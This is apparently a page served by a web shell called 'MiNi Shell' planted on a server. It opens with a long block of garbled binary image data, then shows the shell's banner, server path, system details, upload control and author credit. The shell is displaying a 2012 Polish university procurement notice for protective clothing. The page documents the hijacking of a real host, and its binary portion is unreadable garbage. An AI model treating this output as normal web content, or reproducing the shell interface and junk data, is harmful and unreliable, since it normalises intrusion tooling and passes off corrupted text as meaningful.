JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120914/349008-N-2012.html

<p class="kh_header"><b>Olsztyn: Dostawa sukcesywna odzieży ochronnej do jednostek organizacyjnych Uniwersytetu Warmińsko-Mazurskiego w Olsztynie.</b><br>
<b>Numer ogłoszenia: 349008 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sukcesywna odzieży ochronnej do jednostek organizacyjnych Uniwersytetu Warmińsko-Mazurskiego w Olsztynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa sukcesywna odzieży ochronnej do jednostek organizacyjnych Uniwersytetu Warmińsko-Mazurskiego w Olsztynie.
2. Warunki ogólne, które przedmiot zamówienia musi spełniać:
a) Mocne szycie - wszystkie szwy podwójne.
b) Dodatki z tworzyw sztucznych np. zatrzaski, guziki, klamry powinny być odporne na przewidziane zabiegi konserwacyjne.
c) Dodatki metalowe np. zatrzaski, guziki, klamry powinny być wykonane z materiałów, które nie ulegają korozji w procesie konserwacji i użytkowania.
d) Wszystkie elementy narażone na rozerwania lub wyrwanie winny być szczególnie wzmocnione, np. nitem lub wielokrotnie przeszyte.
e) Do mocowania zatrzasków, guzików i wykonania dziurek należy stosować co najmniej dwie warstwy materiału.
f) Poszczególne elementy środków odzieży i obuwia ochronnego i roboczego muszą spełniać wymagania techniczne i jakościowe przedmiotu zamówienia z zachowaniem norm wskazanych przez Zamawiającego.
g) Rozmiary odzieży, rękawic i obuwia muszą być zgodne z rozmiarami podanymi przez Zamawiającego.
h) Odzież musi posiadać napisaną w języku polskim instrukcję przechowywania i konserwacji oraz użytkowania. 
3. W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta Zamawiający zgodnie z treścią art. 29 ust. 3 ustawy prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych.
Przedmiot zamówienia obejmuje: 1. Bluza polarowa damska z kapturem - 1 sztuka, 2. Bluza polarowa męska z kapturem - 1 sztuka, 3. Buty rybackie - 1 para, 4. Buty medyczne (klapki z otwartymi palcami) damskie - 1 para, 5. Buty medyczne (klapki z zamkniętymi palcami) damskie - 1 para, 6. Buty medyczne (klapki z zamkniętymi palcami) męskie - 1 para, 7. Czapka z daszkiem - 1 sztuka, 8. Czepek lekarski - 1 opakowanie (50 sztuk), 9. Fartuch damski (medyczny) z krótkimi rękawami - 1 sztuka, 10. Fartuch drelichowy męski - 1 sztuka, 11. Fartuch kwaso i ługochronny przedni - 1 sztuka, 12. Fartuch laboratoryjny damski (na zatrzaski z kieszeniami na zewnątrz) - 1 sztuka, 13. Fartuch laboratoryjny damski (na zatrzaski z kieszeniami od wewnątrz) - 1 sztuka, 14. Fartuch laboratoryjny męski (na zatrzaski z kieszeniami na zewnątrz) - 1 sztuka, 15. Fartuch laboratoryjny męski (na zatrzaski z kieszeniami od wewnątrz) - 1 sztuka, 16. Fartuch lekarski (fizelinowy) - 1 opakowanie (10 sztuk), 17. Fartuch spawalniczy skórzany - 1 sztuka, 18. Fartuch wodochronny przedni - 1 sztuka, 19. Gogle lub okulary spawalnicze ochronne - 1 sztuka, 20. Gumofilce męskie - 1 para, 21. Hełm ochronny - 1 sztuka, 22. Kalosze gumowe damskie - 1 para, 23. Kalosze gumowe męskie - 1 para, 24. Kalosze lekkie damskie z wymienną skarpetą - 1 para, 25. Kalosze lekkie męskie z wymienna skarpetą - 1 para, 26. Kamizelka ocieplana - 1 sztuka, 27. Kamizelka ostrzegawcza (odblaskowa) - 1 sztuka, 28. Koszula flanelowa - 1 sztuka, 29. Kurtka przeciwdeszczowa z kapturem - 1 sztuka, 30. Maska chirurgiczna - 1 opakowanie (50 sztuk), 31. Nakolanniki  skórzane dla dekarzy - 1 para, 32. Obuwie profilaktyczne drewniaki damskie - 1 para, 33. Obuwie profilaktyczne drewniaki męskie - 1 para, 34. Ochraniacze na obuwie foliowe wysokie (sanitarne) - 1 opakowanie (100 sztuk), 35. Ochraniacze na obuwie (fizelinowe) do kostki - 1 opakowanie (100 sztuk), 36. Ochraniacze na obuwie (foliowe) do kostki - 1 opakowanie (100 sztuk), 37. Ochrona twarzy na pasku z poliwęglanu - 1 sztuka, 38. Ochronniki słuchu na pałąku - 1 sztuka, 39. Okulary ochronne z gumką z poliwęglanu (gogle) - 1 sztuka, 40. Okulary przeciwodpryskowe ochronne z poliwęglanu - 1 sztuka, 41. Półbuty ochronne (sandały)   damskie - 1 para, 42.Półbuty ochronne (sandały)  męskie z metalowym podnoskiem - 1 para, 43. Półmaska dwufiltrowa wielokrotnego użytku - 1 sztuka, 44. Półmaska filtrująca z zaworem wydechowym - 1 sztuka, 45. Półmaska filtrująca - 1 sztuka, 46. Ręcznik frotte - 1 sztuka, 47. Trzewiki ochronne skórzane z wkładką antyprzebiciową - 1 para, 48. Trzewiki robocze skórzane z metalowym podnoskiem - 1 para, 49. Ubranie chirurgiczne do dezynfekcji w autoklawach - 1 komplet (bluza i spodnie), 50. Ubranie ochronne wysokiej jakości typ szwedzki - 1 komplet (bluza i spodnie), 51. Wodery - 1 para, 52. Wymienne wkłady do półmasek z poz. 43 - 1 komplet (2 sztuki), 53. Wymienne wkłady do półmasek z poz. 43 - 1 komplet (2 sztuki), 54. Wymienne wkłady do półmasek z poz. 43 - 1 komplet (2 sztuki), 55. Wymienne wkłady do półmasek z poz. 43 - 1 komplet (2 sztuki), 56. Zarękawek (fizelinowy) - 1 opakowanie (100 sztuk), 57. Rękawice gumowe flokowane gospodarcze - 1 para, 58. Rękawice gumowe flokowane supermocne - 1 para, 59. Rękawice z PCV kwasoodporne - 1 para, 60. Rękawice robocze skórzane  - 1 para, 61. Rękawice ogrodnicze jednostronnie powlekane gumą tzw. wampirki - 1 para, 62. Rękawice dzianinowe powlekane poliuretanem - 1 para, 63. Rękawice poliestrowe jednostronnie powlekane lateksem - 1 para, 64. Rękawice poliestrowe powlekane nitrylem - 1 para, 65. Rękawice robocze z dzianiny jednostronnie nakrapiane - 1 para, 66. Rękawice spawalnicze skórzane - 1 para, 67. Rękawice szklarskie antyprzecięciowe - 1 para, 68. Rękawice termiczne - 1 para, 69. Rękawiczki chirurgiczne lateksowe, jałowe - 1 para, 70. Rękawiczki chirurgiczne lateksowe, jałowe - 1 para, 71. Rękawiczki chirurgiczne lateksowe, jałowe - 1 para, 72. Rękawiczki chirurgiczne lateksowe, jałowe - 1 para, 73. Rękawiczki chirurgiczne lateksowe, jałowe - 1 para, 74. Rękawiczki diagnostyczne delikatnie pudrowane - 1 opakowanie (100 sztuk), 75. Rękawiczki diagnostyczne delikatnie pudrowane  - 1 opakowanie (100 sztuk), 76. Rękawiczki diagnostyczne delikatnie pudrowane - 1 opakowanie (100 sztuk), 77. Rękawiczki nitrylowe bezpudrowe - 1 opakowanie (100 sztuk), 78. Rękawiczki winylowe bezpudrowe - 1 opakowanie (100 sztuk).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.80.00.00-7, 18.10.00.00-0, 18.40.00.00-3, 18.40.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu oceny
spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu oceny
spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu oceny
spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu oceny
spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu oceny
spełnienia warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą
podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego, formularz ofertowy
sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu Zamówień
Publicznych UWM w Olsztynie, formularz
cenowy sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu
Zamówień Publicznych UWM w Olsztynie, wykaz próbek sporządzony przez Wykonawcę według
wzoru zamieszczonego na stronie Działu Zamówień Publicznych UWM w Olsztynie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące: a)zmiany terminu realizacji
umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem
umowy, np. działanie siły wyższej, b)zmiany terminu realizacji umowy, ze względu na wystąpienie
okoliczności, których strony umowy nie były w stanie przewidzieć przed jej zawarciem, pomimo
zachowania należytej staranności, c) zmiany przedmiotu umowy w przypadku, gdy odzież ochronna lub obuwie, będące przedmiotem niniejszej umowy nie będą dostępne na rynku z powodu zaprzestania produkcji lub wycofania z rynku, pod warunkiem, że produkt zamienny będzie równoważny lub lepszy od wymaganego przez Zamawiającego oraz cena nie przekroczy ceny ofertowej brutto w zakresie produktu, którego będzie dotyczyć zmiana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uwm.edu.pl/zamowienia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet
Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych, pok. 311, ul. Oczapowskiego 2,
Olsztyn 10 - 719..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 10:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział
Zamówień Publicznych, pok. 309, ul. Oczapowskiego 2, Olsztyn 10 - 719.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com